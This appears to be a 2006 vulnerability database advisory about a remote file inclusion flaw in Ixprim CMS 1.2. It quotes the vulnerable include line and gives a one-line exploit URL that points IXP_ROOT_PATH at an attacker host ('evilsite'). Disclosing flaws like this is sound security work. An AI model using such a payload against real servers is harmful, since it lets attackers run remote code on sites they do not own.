Ixprim CMS 1.2 Remote File Include Vulnerability

2006-11-22T00:00:00
ID SECURITYVULNS:DOC:15166
Type securityvulns
Reporter Securityvulns
Modified 2006-11-22T00:00:00

Description

Aplication : Ixprim CMS 1.2

URL :http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip

variable ixpts.class.php

include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );

Exploit : http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite

vitux

vitux.manis@gmail.com